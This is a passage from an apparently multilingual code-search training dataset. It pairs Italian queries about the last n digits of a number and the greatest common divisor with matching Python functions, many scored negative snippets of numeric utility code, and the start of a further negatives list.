"0.5784918", "0.5784551", "0.57803893", "0.5769122", "0.5765927", "0.57519865", "0.57516533", "0.57495177", "0.57495105", "0.574914", "0.5746351", "0.574369", "0.57397425", "0.573819", "0.5734801", "0.57323176", "0.57275426", "0.57193303", "0.5717399", "0.57160336", "0.5715342", "0.5713003", "0.5707195", "0.5706487" ]
0.0
-1
Ultime n cifre del numero num
def last_n_digits(num, n): return num%(10**n)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def digit(number: int, n: int) -> int:\n return number // 10 ** n % 10", "def getNumber():", "def residuo_cero(numero):\n for x in range (1,10):\n if(numero % x == 0):\n return x \n return numero", "def CLng(num):\n return int(round(float(num)))", "def digito_verificacao(n):\n \n # Para obtermos o digito de verificacao, comecamos por somar todos os digitos do cartao, com excecao do de controle. Caso o resto da soma por 10 seja diferente de 0, o digito sera a diferenca entre 10 e esta. Caso seja 0, e este o digito de verificacao. \n\n soma = calc_soma(n)\n \n dig_ver = 0 \n \n if soma%10 != 0:\n dig_ver = 10 - soma%10\n \n \n return str(dig_ver)", "def cut_number(n):\n i = 0\n while True:\n cur = n % 10\n ahead = n // 10 % 10\n if cur > ahead:\n i += 1\n break\n i += 1\n n //= 10\n return i", "def get_n_digit(num):\n cnt = 0\n while num & 1 != 1:\n num >>= 1\n cnt += 1\n # print(cnt)\n return cnt", "def last_digit(n):\n\n return n % 10", "def numerize():\n pass", "def get_dig_num(num, n = 1):\n digit = num//10**n%10 # this is the n-th digit, 0-indexed\n return digit", "def fn(n):\n digits = [int(x) for x in str(n)]\n for i in reversed(range(len(digits)//2+1)): \n if digits[i] < 9: break \n else: return 10*n + 11\n digits[i] = digits[~i] = digits[i] + 1\n for ii in range(i): \n digits[~ii] = digits[ii]\n for ii in range(i+1, len(digits)//2+1): \n digits[ii] = digits[~ii] = 0\n return int(\"\".join(map(str, digits)))", "def returnOnceDigit(no):\n \n div = 1\n for i in range(1,len(str(no))):\n div = div * 10\n no = int(no)\n while(not no < 10):\n no = no % div\n div = div/10\n return int(no)", "def get_t(self, n, c):\n t = 1\n while t * n + t * t * n * n < 2 * c:\n t += 1\n return t - 1", "def transforme(n):\n if n<10 :\n return '0'+str(n)\n else :\n return str(n)", "def _to_int(self, num):\n assert isinstance(num, Number), 'Is not number in _to_int'\n return floor(self.__tick_to_unit_time * num)", "def n():\n # For documentation purposes", "def gera_num_cc(abv):\n \n # Ao recebermos a indicacao de que entidade se pretende gerar um numero, usamos a funcao auxiliar escolhe_iin_comp para escolher aleatoriamente os digitos iniciais e o comprimento do cartao.\n # O numero final comeca por ser os digitos iniciais, juntando a estes, do lado direito, numeros aleatorios ate chegarmos ao comprimento pretendido menos 1. O ultimo digito sera o digito de verificacao.\n \n dig_iniciais , comp = escolhe_iin_comp(abv) \n num_cc = dig_iniciais\n \n for i in range(comp-len(dig_iniciais)-1): \n num_cc = num_cc + str(int(random()*10)) \n \n num_cc = num_cc + digito_verificacao(num_cc)\n \n return int(num_cc)", "def countdown(n):\n while n > 0:\n n -= 1", "def int2dec(n: int) -> str:", "def nr():\n pass", "def time(n):\n steps = 3 + math.ceil(n/5.0)*2\n return steps", "def mirror(n):\n return (n % 10)*10 + (n // 10)", "def cuadrado(n):\n cuadrado=n**2\n print n, \"al cuadrado es\", cuadrado\n return cuadrado", "def lastTen(self, num, length):\n\t\tif (length-num <=10):\n\t\t\treturn 1\n\t\treturn 0", "def calc_rec_cycle(number):\n result = 0\n i = 10 ** (int(math.log10(number)) + 1)\n s = set()\n\n while True:\n if i == number or i == 0:\n result = 0\n break\n\n if i < number:\n result += 1\n i *= 10\n continue\n\n # i > n\n r = i % number\n #print('r',r)\n if r not in s:\n result += 1\n s.add(r)\n else:\n break\n\n i = r * 10\n return result", "def numero_a_letras(n):\n especiales = {0: 'cero', 10: 'diez', 11: 'once', 12: 'doce', 13: 'trece', 14: 'catorce', 15: 'quince', 20: 'veinte', 100: 'cien', 1000: 'mil'}\n if n in especiales:\n return especiales[n]\n if n < 100:\n cifras = ['', 'una', 'dos', 'tres', 'cuatro', 'cinco', 'seis', 'siete', 'ocho', 'nueve']\n decenas = ['', 'dieci', 'veinti', 'treinta', 'cuarenta', 'cincuenta', 'sesenta', 'setenta', 'ochenta', 'noventa']\n if n % 10 == 0:\n return decenas[n // 10]\n if n < 30:\n return f\"{decenas[n // 10]}{cifras[n % 10]}\"\n return f\"{decenas[n // 10]} y {cifras[n % 10]}\"\n elif n < 1000:\n centenas = ['', 'ciento', 'doscientas', 'trescientas', 'cuatrocientas', 'quinientas', 'seiscientas', 'setecientas', 'ochocientas', 'novecientas']\n if n % 100 == 0:\n return centenas[n // 100]\n return f\"{centenas[n // 100]} {numero_a_letras(n % 100)}\"\n elif n < 10**6:\n if n < 2000:\n return f\"mil {numero_a_letras(n % 1000)}\"\n if n % 1000 == 0:\n return f\"{numero_a_letras(n // 1000)} mil\"\n return f\"{numero_a_letras(n // 1000)} mil {numero_a_letras(n % 1000)}\"\n else:\n raise ValueError(\"Numero demasiado grande\")", "def zernike_num_coeff(n):\n \n\tif not (n>=0):\n\t\tprint('Input parameter must be >= 0')\n\t\traise AssertionError() \n \n\treturn sum(xrange(n+1)) + n+1", "def generate_n3(self):\r\n tot = 0\r\n str2 = self.time\r\n ss = float(str2.microsecond)\r\n n = ceil(ss * 100) / 1000.0\r\n while n > 0:\r\n dig = n % 10\r\n tot = tot+dig\r\n n = n//10\r\n self.n_3 = tot\r\n self.n_3decimal = int(abs(pi)*math.pow(10, self.n_3)) % 10", "def monotoneIncreasingDigits(self, N: int) -> int:\n digits = [int(e) for e in str(N)]\n pointer = len(digits)\n for i in range(len(digits) - 1, 0, -1):\n if digits[i - 1] > digits[i]:\n pointer = i\n digits[i - 1] -= 1\n\n for i in range(pointer, len(digits)):\n digits[i] = 9\n\n return int(\"\".join(map(str, digits)))", "def evaluate_number(number : int)->int:\n if type(number) == int and number >1 and number < 100:\n num = total_numbers = porc = 0\n while porc < number:\n num = num + 1\n clasificate = is_bouncy(str(num))\n result = evaluate(clasificate , num)\n if result:\n total_numbers = total_numbers + 1\n porc = total_numbers * 100 / num\n return num\n return 0", "def headbut_miss(num):\r\n\tglobal php\r\n\tif num == 0:\r\n\t\tphp -= 10\r\n\t\treturn 0\r\n\telse:\r\n\t\treturn num", "def _get_time(self, sec, nsec):\n return sec + nsec / (10**9)", "def compute(num):\n # 567 / 9 = 63, 235 / 47 = 5\n num = (num * 63 + 7492) * 5 - 498\n if num < 0: # modulus won't give correct result if number is negative\n num *= -1\n res = (num // 10) % 10\n return res", "def ndigits(n):\n return len(str(abs(n)))", "def litres(time):\n return int(time / 2)", "def next_integer(n):\n if n % 2 == 0:\n return n // 2\n else:\n return 3 * n + 1", "def _num(self):\n try:\n num = int(self.__rId[3:])\n except ValueError:\n num = 9999\n return num", "def __int__(self):\n return int(self.micros() // 1000000)", "def inc_num(num):\n return num + 1", "def get_tribonnaci(self, n):\n if n not in self.numbers:\n current_n = max(self.numbers)\n while current_n < n:\n current_n += 1\n self.numbers[current_n] = self.numbers[current_n - 1] + \\\n self.numbers[current_n - 2] + \\\n self.numbers[current_n - 3]\n return self.numbers[n]", "def valor_absoluto(numero):\r\n if numero >= 0:\r\n return numero\r\n else:\r\n return - numero", "def count_digit(x, i):\n \"\"\" GRAPSTE TON KWDIKA SAS APO KATW \"\"\"\n su = 0\n s = 0\n k = x\n while(i>1):\n x = x//10\n i = i-1\n s = x%10\n while(k>0):\n if((k%10)==s):\n su = su + 1\n k = k//10\n return su", "def cascade(n):\n print(n)\n if n >= 10:\n cascade(n//10)\n print(n)", "def get_seq_num():\n t = datetime.datetime.now()\n mt = time.mktime(t.timetuple())\n nextnum = int(mt)\n retval = nextnum % 10000000\n return retval", "def n(self):\n pass", "def reverse_digits(number: int):\n acc = 0\n\n while number != 0:\n acc *= 10\n acc += number % 10\n\n number //= 10 # 정수 나눗셈\n\n return acc", "def diviseur(n):\n s = 0\n for i in range (1, n):\n if n%i == 0:\n s += 1\n print(i)\n return \"Le nombre de diviseurs est\", s", "def thou(n):\n if pthou:\n return \"{:,d}\".format(n)\n return \"{:d}\".format(n)", "def first_n_digits(num, n):\n return num // 10 ** (int(math.log(num, 10)) - n + 1)", "def get_digit(n):\n \"\"\"\n 9 - 9\n 10-99 - 2*90 \n 100-999 - 3*900\n \"\"\"\n i = 0\n start = 0\n done = False\n while not done:\n step = (i+1)*9*(10**i)\n if start + step > n:\n done = True\n else:\n start += step\n i += 1\n\n num_digits = i + 1\n\n offset = n - start\n number = offset // num_digits + \\\n (10**(num_digits-1) if (num_digits - 1) else 0)\n _i = (offset - 1) % num_digits\n return int(str(number)[_i])", "def count_to10():\n numberx = 0\n while numberx < 10:\n numberx += 1\n print(numberx)", "def num_digits(num):\r\n if num == 0:\r\n return 1\r\n return int(log10(num)+1)", "def num(self):\n return self.num", "def firstTen(self, num):\n\t\tif num <= 10:\n\t\t\treturn 1 \n\t\treturn 0", "def get_period(n):\n remainder = 1\n i = 1\n cache = {}\n while True:\n remainder = (10 * remainder) % n\n if remainder in cache:\n return i - cache[remainder]\n\n cache.update({remainder: i})\n i += 1", "def convert_base(num, n):\r\n new_num_string = ''\r\n current = num\r\n while current != 0:\r\n remainder = current % n\r\n if remainder > 9:\r\n remainder_string = HEX_CHARS[remainder]\r\n elif remainder >= 36:\r\n remainder_string = '('+str(remainder)+')'\r\n else:\r\n remainder_string = str(remainder)\r\n new_num_string = remainder_string+new_num_string\r\n current = current//n\r\n return new_num_string", "def calc_soma(n):\n \n # Comecamos por percorrer os caracteres de n, e juntamos a cada caracter o que estava à sua direira, do lado esquerdo, invertendo o numero. Caso um dos caracteres nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Seguidamente, percorremos a cadeia recem criada. OS caracteres nas posicoes impares da cadeia anterior (indices 0,2,4,..) vao ser multiplicados por 2. Se a multiplicacao der um resultado superior a 9, subtrai-se 9. Os caracteres nas posicoes pares vao para a nova cadeia sem qualquer alteracao.\n # Finalmente percorremos os elementos da cadeia e somamos, convertidos a inteiros.\n \n \n comp = len(n)\n num_invertido , num_invertido2 = '' , ''\n soma_luhn = 0\n \n for e in n:\n \n if '0' <= e <= '9': \n num_invertido = e + num_invertido\n \n else:\n raise ValueError ('function calc_soma(): O string recebido apenas pode conter digitos')\n \n \n for i in range(comp):\n \n if i%2 == 0:\n resultado = eval(num_invertido[i]) * 2\n \n if resultado > 9:\n num_invertido2 = num_invertido2 + str(resultado - 9)\n \n else:\n num_invertido2 = num_invertido2 + str(resultado)\n \n else:\n num_invertido2 = num_invertido2 + (num_invertido[i])\n \n\n for e in num_invertido2:\n soma_luhn = soma_luhn + eval(e)\n \n return soma_luhn", "def lucas(n):\n \n A = 2\n B = 1\n Counter = 1\n C = 0 \n \n while Counter <= n:\n C = A + B\n A = B\n B = C\n Counter = Counter + 1\n if (Counter + 1) == n:\n return C", "def normexponent(val):\n n = np.log10(val)\n if n < 0:\n n = int(n) - 1\n else:\n n = int(n)\n return n", "def find_num(n: int) -> int:\n n = n - 54 * (n // 54)\n n = n - 6 * (n // 6)\n flat_nums = {1:1,\n 2:2,\n 3:3,\n 4:4,\n 5:5,\n 0:6}\n return(flat_nums[n%6])", "def next_num(cls):\r\n cls.num += 1\r\n return cls.num", "def sumn(n):\n return n * (n + 1) // 2", "def calc(self):\n num = 22\n while not self.divisible(num):\n # we know that only even numbers are divisible by 2, so\n # we only inspect even numbers.\n num = num + 2\n if num % 10000:\n print(str(num), end='\\r')\n\n return num", "def updateNumerosity(self, num):\n self.numerosity += num", "def nze(self) -> int:", "def nze(self) -> int:", "def record_digits(n):\n return record_digits_acc(str(n), 0, [0]*10)", "def micros() -> int:", "def karana(n):\n if n == 1:\n return 0\n elif n > 57:\n return n - 50\n else:\n return amod(n - 1, 7)", "def number(self):", "def RecCountup(n):\n if n == 0:\n return print('0')\n RecCountup(n - 1)\n print(n)", "def f(n):\n\tfor i in range(101, n):\n\t\tif (i % 21 == 0):\n\t\t\treturn i", "def numer(self, a):\n return a", "def number(self):\n return self._num", "def get_oglindit(numar):\n if numar < 0:\n return numar\n numar_str = str(numar)\n numar_str = numar_str[::-1]\n return int(numar_str)", "def print_last_digit(number):\n\n ld = abs(number) % 10\n print(ld, end=\"\")\n return ld", "def natural_numbers():\n \n acc=0\n for x in range(1000): \n if x%3==0 or x%5==0:\n acc=acc+x\n return acc", "def sumDigit():", "def generate_n1(self):\r\n obj = Random\r\n self.n_1 = int(int(obj.date_split[0])-2000)+int(obj.date_split[1])+int(obj.date_split[2])\r\n self.n_1decimal = int(abs(pi)*math.pow(10, self.n_1)) % 10", "def digit_sum(n):\n s = 0\n while n:\n s += n % 10\n n //= 10\n return s", "def acc_num_gen():\n try:\n max_agg = Dataset.objects.all().aggregate(models.Max('accession_number'))\n max_val = max_agg['accession_number__max']\n match = re.search('\\d+', max_val)\n int_val = int(max_val[match.span()[0]:match.span()[1]])\n except (TypeError, AttributeError):\n int_val = 0\n \n if int_val < 200:\n int_val = 200\n else:\n int_val += 1\n return \"ds%06d\" % (int_val)", "def nw(n):\n return 4*n*n + 1", "def cbrt(num):\r\n if not isinstance(num, dec.Decimal):\r\n num = dec.Decimal(num)\r\n if num == 0:\r\n return dec.Decimal(0)\r\n context = getcontext()\r\n context.prec += 2\r\n x = num / 3\r\n while True:\r\n p = x\r\n x = (2*x + num/x/x) / 3\r\n if p == x:\r\n context.prec -= 2\r\n return x", "def esprimo(numero):\n\tcontador = 2\n\t\n\tresultado = True\n\t\n\t#Loop principal. Corre hasta que el contador sea numero - 1.\n\twhile contador < numero:\n\t\t#Hace la division.\n\t\tresto = numero % contador\n\t\t\n\t\t#Mientras la division no sea 0, se salta esta parte completamente.\n\t\twhile resto == 0:\n\t\t\t#Si la division es 0, esto entrara en un loop infinito.\n\t\t\tresultado = False\n\t\t\t#por eso rompemos el loop con break\n\t\t\tbreak\n\t\t\n\t\tcontador += 1\n\treturn resultado", "def monotoneIncreasingDigits(N):\n sN = str(N)\n backn = 0\n res = []\n for i in range(len(sN)):\n if i == 0:\n res.append(sN[i])\n continue\n num = int(sN[i])\n lastn = int(sN[i-1])\n if num > lastn:\n res.append(sN[i])\n backn = 0\n elif num == lastn:\n res.append(sN[i])\n backn += 1\n else:\n if backn == 0:\n l = int(res.pop())\n res.append(str(l-1))\n else:\n for j in range(backn):\n res[i-j-1] = '9'\n res[i-backn-1] = str(int(res[i-backn-1])-1)\n for j in range(i, len(sN)):\n res.append('9')\n break\n res = int(''.join(res))\n return res", "def octagonal(n: int) -> int:\n return int(n * (3 * n - 2))", "def triangular_number(n):\n return n*(n+1) / 2", "def trailingZeroes(self, n):\n cnt = 0\n while n:\n n /= 5\n cnt += n\n\n return cnt", "def ltos(n):\r\n s = ''\r\n for x in (2**24, 2**16, 2**8):\r\n quot, rem = (n/x, n%x)\r\n s += chr(quot)\r\n n = rem\r\n s += chr(n % 256)\r\n return s", "def last_digits(x,y,n):\n\tr = modexp(x,y, 10**n)\n\n\t#post processing to make sure we didn't cut off a leading 0\n\treturn str(r).zfill(n)", "def random_num(self):\r\n self.generate_n1()\r\n self.generate_n2()\r\n self.generate_n3()\r\n self.generate_n4()\r\n random_number = str(self.n_1decimal)+str(self.n_2decimal)+str(self.n_3decimal)+str(self.n_4decimal)\r\n print int(random_number)", "def floor(n: float) -> int:\n return int(n // 1)", "def _irep_to_value(self,n,i):\n if i == 1:\n j,k = divmod(n,9)\n v = (k+1)*10**j\n return v\n else:\n j,k = divmod(n,int(10.0/i))\n if k == 0:\n v = 10**j\n else:\n v = i*k*10**j\n return v", "def _number_of_digits(number: int) -> int:\n return int(log10(number)) + 1", "def demo_a_number(random_number):", "def sum_digits(n):\n \"*** YOUR CODE HERE ***\"\n count=0\n length=len(str(n))\n last=0\n sum=0\n while count<length:\n last=n%10\n n//=10\n sum+=last\n count+=1\n return sum", "def lentero():\r\n\twhile True:\r\n\t\tn = raw_input(\"Ingrese el valor deseado: \")\r\n\t\ttry:\r\n\t\t\tn_1 = int(n)\r\n\t\t\treturn n_1\r\n\t\texcept ValueError:\r\n\t\t\tprint(\"POR FAVOR: Ingrese un valor numerico y entero\")", "def getN(self)->int:\n return self.n", "def I (self, n):", "def gen_num(lim=10000):\n n = 1\n yield 2\n yield 3\n while 6 * n + 1 <= lim:\n yield 6 * n - 1\n yield 6 * n + 1\n n += 1" ]
[ "0.66533923", "0.6577843", "0.6550088", "0.6524935", "0.6478077", "0.6407476", "0.64042294", "0.63701874", "0.63546324", "0.6320073", "0.63194585", "0.63091135", "0.62533474", "0.6244983", "0.62103593", "0.61851996", "0.6173337", "0.61667633", "0.6162774", "0.6149299", "0.61209244", "0.6113393", "0.6094902", "0.6094281", "0.60822403", "0.6078822", "0.6078523", "0.6063073", "0.60520536", "0.60503995", "0.6050318", "0.60373", "0.60362893", "0.6022534", "0.60025316", "0.5992554", "0.59891546", "0.5988465", "0.5984015", "0.59787893", "0.59742844", "0.59738904", "0.59669834", "0.5935209", "0.59284127", "0.5925022", "0.5911113", "0.5908617", "0.58921444", "0.58853257", "0.58691424", "0.5843146", "0.58051974", "0.57847846", "0.57819384", "0.5771267", "0.5763953", "0.5761483", "0.57583326", "0.57565534", "0.5744063", "0.5741492", "0.5736454", "0.5730399", "0.5721543", "0.5721543", "0.5720966", "0.5701215", "0.5684342", "0.56827086", "0.5668614", "0.5661153", "0.5652949", "0.56509215", "0.5647594", "0.5645142", "0.564402", "0.56418824", "0.5641318", "0.5638629", "0.56269217", "0.56100386", "0.5607286", "0.56032336", "0.56001997", "0.5596441", "0.5594669", "0.55882037", "0.5584019", "0.5583847", "0.5583677", "0.5578341", "0.55778897", "0.55775535", "0.55747736", "0.55737936", "0.5569122", "0.55660045", "0.556558", "0.556433" ]
0.62598634
12
Massimo comune denominatore tra a e b
def mcd(a, b): while(b != 0): a,b = b,a%b return a
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def denom(self, a):\n return self.one", "def denom(self, a):\n raise NotImplementedError", "def ppcm_denominateurs(self):\n\t\tl = []\n\t\tn = 1\n\t\tif self.__valide:\n\t\t\tfor m in self.liste_decroissante():\n\t\t\t\t\"\"\" les denominateurs sont positifs \"\"\"\n\t\t\t\te = m.get_coefficient().get_denom().valeur()\n\t\t\t\tif not (e in l):\n\t\t\t\t\tl.append(e)\n\t\t\t\tn *= e\n\t\treturn n / pgcd_liste(l)", "def calculate(a: int) -> int:\n if a == 0:\n raise ZeroDivisionError(\"Cannot compute the multiplicative inverse of 0 in a Galois field.\")\n\n r2, r1 = CHARACTERISTIC, a\n t2, t1 = 0, 1\n\n while r1 != 0:\n q = r2 // r1\n r2, r1 = r1, r2 - q * r1\n t2, t1 = t1, t2 - q * t1\n\n if t2 < 0:\n t2 += CHARACTERISTIC\n\n return t2", "def resultado(self):\n return self.__numerador/self.__denominador", "def factor_carga(self):\r\n return self.nelementos() / self.n", "def valor(self):\n nbits = len(self.gens)\n dec = int(self.gens,2)\n real = self.min+dec*((self.max-self.min)/(math.pow(2,nbits)-1))\n return real", "def mortalidade(self):\n self.covidbr['mortalidade'] = self.covidbr['obitosAcumulado'] / \\\n (self.covidbr['populacaoTCU2019'] / (10**5))", "def convertir_interes_efectivo_anula_a_mensual(ea):\n return (1 + ea)**(1/12) - 1", "def multiplicar(self):\n self.resultado = self.valor_1 * self.valor_2", "def Calcular(a: float) ->float:\n \n return (a*2)", "def calculo(self):\n return self.peso / (self.altura * self.altura)", "def problem():\n for a in range(1, 380):\n for b in range(a):\n if a + b + (a**2 + b**2)**0.5 == 1000:\n return int(a * b * (a**2 + b**2)**0.5)", "def restar(self):\n self.resultado = self.valor_1 - self.valor_2", "def bspe(a, b):\n if b-a == 1:\n return MPZ_ONE, MPZ(b)\n m = (a+b)//2\n p1, q1 = bspe(a, m)\n p2, q2 = bspe(m, b)\n return p1*q2+p2, q1*q2", "def multiplicaciones(): #906609 tiene que darme\n ultimo_palindromo = 0\n total = 0\n for primer_numero in range(100, 1000):\n for segundo_numero in range(100, 1000):\n #total se encarga de hacer la multiplicacion entre los numeros\n total = primer_numero * segundo_numero\n # llamamos a la funcion que verifica si la multiplicacion que envia es un palindromo\n if obtener_palindromo(total):\n #luego de verificar que la multiplicacion era palindromo pasamos a evaluarla hasta llegar al ultimo palindromo\n #entre 100 y 1000\n if ultimo_palindromo < total:\n ultimo_palindromo = total\n return ultimo_palindromo", "def calculer_moment_quadratique(longueur_base, hauteur_base_bras):\n return longueur_base * pow(hauteur_base_bras, 3) / 12", "def arredonda(elemento):\n chave, mm = elemento\n return (chave,round(mm,1))", "def Mo96(self,dc,nu):\n return 1. + (nu**2.-1.)/dc", "def calculate(self) -> float:", "def calcular_cuota_basica(dependientes):\n\tcuota_basica = 0\n\tif dependientes == 0:\n\t\tcuota_basica = 30\n\telif dependientes == 1:\n\t\tcuota_basica = 60\n\telif dependientes == 2:\n\t\tcuota_basica = 90\n\telif dependientes == 3:\n\t\tcuota_basica = 100\n\telif dependientes == 4:\n\t\tcuota_basica = 120\n\treturn cuota_basica", "def bs(a, b):\n if b - a == 1:\n # Directly compute P(a,a+1), Q(a,a+1) and T(a,a+1)\n if a == 0:\n Pab = Qab = mpz(1)\n else:\n Pab = mpz((6*a-5)*(2*a-1)*(6*a-1))\n Qab = mpz(a*a*a*C3_OVER_24)\n Tab = Pab * (13591409 + 545140134*a) # a(a) * p(a)\n if a & 1:\n Tab = -Tab\n else:\n # Recursively compute P(a,b), Q(a,b) and T(a,b)\n # m is the midpoint of a and b\n m = (a + b) // 2\n # Recursively calculate P(a,m), Q(a,m) and T(a,m)\n Pam, Qam, Tam = bs(a, m)\n # Recursively calculate P(m,b), Q(m,b) and T(m,b)\n Pmb, Qmb, Tmb = bs(m, b)\n # Now combine\n Pab = Pam * Pmb\n Qab = Qam * Qmb\n Tab = Qmb * Tam + Pam * Tmb\n return Pab, Qab, Tab", "def TCMB(rs):\n\n return 0.235e-3 * rs", "def getETA():", "def getETA():", "def calcular_promedio(lista):\r\n suma = 0\r\n promedio = 0\r\n \r\n for marca in lista:\r\n suma += marca[1]\r\n \r\n promedio = suma//len(lista)\r\n \r\n return promedio", "def exp_mod(a, b, nbr):\n bina = [int(x) for x in bin(a)[2:]]\n #binb = [int(x) for x in bin(b)[2:]]\n binn = [int(x) for x in bin(nbr)[2:]]\n #while len(binn)<len(bina):\n # binn = [0]+binn\n #print(bina, binn)\n binn.reverse()\n bina.reverse()\n n = len(bina)+len(binn)*4+1\n na = len(bina)\n nan = len(bina)+len(binn) # debut de Y\n nany = len(bina)+2*len(binn)+1 # debut de \"A\" (ici c'est b)\n nanya = len(bina)+3*len(binn)+1 # debut de \"APOW\" (ce qui doit etre mesuré)\n q = QuantumRegister(n+2, 'q') # +lost+lost2\n circ = QuantumCircuit(q)\n for i in range(na):\n if bina[i]:\n circ.x(q[i])\n for i in range(len(binn)):\n if binn[i]:\n circ.x(q[na+i])\n expmod(circ, q, # X, a, A, APOW, Y, n, N, binn, lost, lost2)\n [q[i] for i in range(len(bina))],\n b%nbr,\n [q[i+nany] for i in range(len(binn))],\n [q[i+nanya] for i in range(len(binn))],\n [q[i+nan] for i in range(len(binn)+1)],\n nbr,\n [q[i+na] for i in range(len(binn))],\n binn,\n q[n],\n q[n+1])\n if len(bina)%2:\n circ_m = measure(circ, q, [i for i in range(nan,nany)])\n else:\n circ_m = measure(circ, q, [i for i in range(nanya,n)])\n #circ_m = measure(circ, q, [i for i in range(n)])\n return circ_m", "def abbott_elec():\n per_kwh = 0.08 # [$/kWh]\n return per_kwh", "def mutual_info(a,b,c,n):\r\n if a == 0: \r\n return 0\r\n print(a,b,c,n) \r\n return log10((a * n) / ((a + c) * (a + b)))", "def find_c(b):\n return (2*(b**2) - 2000*b + 1000000)/(2000 - 2*b)", "def calculate(self):", "def produto(conexao, valores):\n try:\n return '{0}'.format(float(valores[1]) * float(valores[2]))\n except:\n return 'ERRO'", "def my(a,b) :\n c = (a+b)\n d = c *100/160\n return d", "def Manera10(self,dc,nu):\n if len(self.bias_par.keys()) == 0:\n q = 0.709\n p = 0.248\n else:\n q = self.bias_par['q']\n p = self.bias_par['p']\n return 1. + (q*nu**2.-1.)/dc + (2.*p/dc)/(1.+(q*nu**2.)**p)", "def fla (mva, vnom):\r\n x=mva*1000000\r\n y=(vnom*1000)\r\n z=round(x/y,3)\r\n return z", "def get_taum(cm, rm):\n return cm * rm", "def Grundy(x):\n # n taille bianire max des xi; m longeur de x\n \n # Calcul de la longueur binaire utilisée\n # Complexité en O(m)\n \n n = 0\n \n for val in x :\n t = taille(val)\n if n < t :\n n = t\n \n \n \n # Ecriture de la liste x en binaire\n # Complexité en O(m*n) car binaire(x,n) en O(n)\n \n b = [binaire(val,n) for val in x ]\n \n # Calcul de la somme binaire mod 2 :\n # Complexité en O(m*n) : m valeur dans b; n tours de boucle\n \n a = []\n \n for i in range(n):\n \n s = 0\n \n for val in b :\n s+= val[i]\n \n a.append(s%2)\n \n return(decimal(a))", "def compute(dm,do):\n mae = MV.average(MV.absolute(MV.subtract(dm,do)))\n return float(mae)", "def calcula_premio (jugado, ganado_decimo):\n return ganado_decimo * jugado / 20", "def dividir(self):\n self.resultado = self.valor_1 / self.valor_2", "def tasa_efe(tasa_1, n_1, n_2):\n tasa_2 = (1 + tasa_1)**(n_1 / n_2) - 1 \n return tasa_2", "def bisezione(f,a,b,toll=10**-5):\n m = (a+b)/2\n f_m = f(m)\n while abs(f_m) > toll:\n if f(a)*f_m < 0:\n b = m\n elif f(b)*f_m < 0:\n a = m\n elif f_m == 0:\n print(\"Trovata solzione esatta\")\n return m\n else:\n print(\"Metodo fallito\")\n return None\n m = (a+b)/2\n f_m = f(m)\n return m", "def bs(a, b):\n if b - a == 1:\n # Directly compute P(a,a+1), Q(a,a+1) and T(a,a+1)\n if a == 0:\n Pab = Qab = mpz(1)\n else:\n Pab = mpz((6*a-5)*(2*a-1)*(6*a-1))\n Qab = mpz(a*a*a*C3_OVER_24)\n Tab = Pab * (13591409 + 545140134*a) # a(a) * p(a)\n if a & 1:\n Tab = -Tab\n else:\n # Recursively compute P(a,b), Q(a,b) and T(a,b)\n # m is the midpoint of a and b\n m = (a + b) // 2\n # Recursively calculate P(a,m), Q(a,m) and T(a,m)\n Pam, Qam, Tam = bs(a, m)\n # Recursively calculate P(m,b), Q(m,b) and T(m,b)\n Pmb, Qmb, Tmb = bs(m, b)\n # Now combine\n Pab = Pam * Pmb\n Qab = Qam * Qmb\n Tab = Qmb * Tam + Pam * Tmb\n return Pab, Qab, Tab", "def estimacion01():\n n = 1000 # Simulaciones\n X = generarM()\n M = X # Media Muestral (valor inicial: M(1) = X1)\n S_cuadrado = 0 # Varianza Muestral (valor inicial: S_cuadrado(1) = 0)\n # Calculamos M(n) y S_cuadrado(n)\n for j in xrange(2, n+1):\n X = generarM()\n A = M\n M += (X - M)/float(j)\n S_cuadrado = (1 - 1.0/(j-1))*S_cuadrado + j*((M-A)**2)\n\n S = math.sqrt(S_cuadrado) # Desviacion Estandar Muestral (sigma)\n\n IC = (M - 1.96*(S/math.sqrt(n)) , M + 1.96*(S/math.sqrt(n)))\n\n return M, S_cuadrado, IC", "def convertir_interes_efectivo_anual_a_mensual(interes):\n return (1 + interes)**(1/12) - 1", "def get_M(self):\n return 1.0", "def degree_on_basis(self, b):\n return sum(b)", "def mumo_op(op, mp, mq):\n if op == 3:\n musol = [mp[0] * mq[0], mp[1][:], mp[2][:]]\n for i, v in enumerate(mq[1]): # per cada variable del segon\n if v in musol[1]: # si ja la tenia\n j = musol[1].index(v) # miro on la tinc\n musol[2][j] += mq[2][i] # sumo els graus\n else: # no la tenia\n musol[1].append(mq[1][i]) # l'afegeixo\n musol[2].append(mq[2][i])\n else:\n musol = \"No has pas definit res d'això...\"\n return musol", "def margemLucro(value, args):\n\targs = \"{:.2f}\".format((Decimal(args.split()[1]) - (Decimal(args.split()[0]) * value))/Decimal(args.split()[1])*100)\n\n\treturn args", "def p_transfer(a1, b1, a2, b2, m):\n assert a1 <= NCAR\n assert b1 <= NCAR\n assert a2 <= NCAR\n assert b2 <= NCAR\n\n if a1 < m or b1 < -m:\n return 0\n\n if a2 == 0:\n a2s = (-10, 1)\n elif a2 == NCAR:\n a2s = (NCAR, 10+NCAR)\n else:\n a2s = (a2, a2+1)\n\n if b2 == 0:\n b2s = (-10, 1)\n elif b2 == NCAR:\n b2s = (NCAR, 10+NCAR)\n else:\n b2s = (b2, b2+1)\n\n p = 0\n for a2 in range(*a2s):\n for b2 in range(*b2s):\n d1 = a2 - a1 - m\n d2 = b2 - b1 + m\n\n p += poisson_diff(d1, LAM_RENT1, LAM_RET1) * poisson_diff(d2, LAM_RENT2, LAM_RET2)\n\n return p", "def calcular_nuevo_valor_adeudado( capital, interes ) -> float:\n tasames=convertir_interes_efectivo_anula_a_mensual(interes)\n intereses=capital * tasames\n capital= capital + intereses \n\n # TODO: Desarrollar este método\n # AYUDA: usar el método \"convertir_interes_efectivo_anula_a_mensual\" para convertir el interes de anual a mensual\"\"\"\n return round(capital,2)", "def wce(B):\n return eme*B", "def polimumo_op(op, mumopx, mumoqx):\n musol = []\n if op == 1: # suma\n musol = \"Això no existeix encara, gamarús\"\n elif op == 2: # resta\n musol = \"Això no existeix encara, gamarús\"\n elif op == 3: # multi\n for mx in mumopx:\n for my in mumoqx:\n mnou = mumo_op(3, mx, my)\n afegit = False\n for ms in musol: # miro si el puc sumar amb algun dels que ja tenia\n if mumo_semblant(ms, mnou):\n ms[0] += mnou[0] # sumo coefs\n afegit = True\n break\n if not afegit: # si no he pogut l'afegeixo al final\n 